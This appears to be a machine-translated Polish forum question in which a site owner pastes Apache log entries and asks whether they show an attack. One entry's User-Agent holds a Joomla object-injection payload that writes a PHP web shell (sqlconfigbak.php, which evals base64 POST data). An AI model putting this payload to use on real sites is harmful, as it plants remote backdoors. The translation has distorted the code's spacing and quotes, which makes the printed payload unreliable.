Wpisy dziennika dostępu Apache w mojej witrynie są zwykle takie:
207.46.13.174 - - [31 października 2016: 10: 18: 55 +0100] „GET / contact HTTP / 1.1” 200 256 ”-„ ”Mozilla / 5.0 (kompatybilny; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
dzięki czemu można zobaczyć tam pole użytkownika użytkownika. Ale dzisiaj znalazłem również pole użytkownika-klienta używane w ten sposób:
62.210.162.42 - - [31 października 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 : "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: „SimplePie”: 5: {s: 8: „sanitize”; O: 20: „JDatabaseDriverMysql”: 0: {} s: 8: „feed_url”; s: 242: „file_put_contents ($ _ SERVER [„ DOCUMENT_ROOT ” ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST ['z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); exit;"; s: 19: " cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304
Czy to był atak? Wygląda na to, że następny wpis dziennika został pomyślnie pobrany (kod 200) z pliku sqlconfigbak.php
wymienionego w skrypcie. Chociaż nie mogę znaleźć pliku w systemie plików:
62.210.162.42 - - [31 października 2016: 11: 24: 20 +0100] „GET //sqlconfigbak.php HTTP / 1.1” 200 399 ”http://www.googlebot.com/bot.html„ ”Mozilla /5.0 (kompatybilny; Googlebot / 2.1; + http: //www.google.com/bot.html) „0.244 BYPASS 10.10.36.125:104 0.244
Proszę, co się tutaj działo?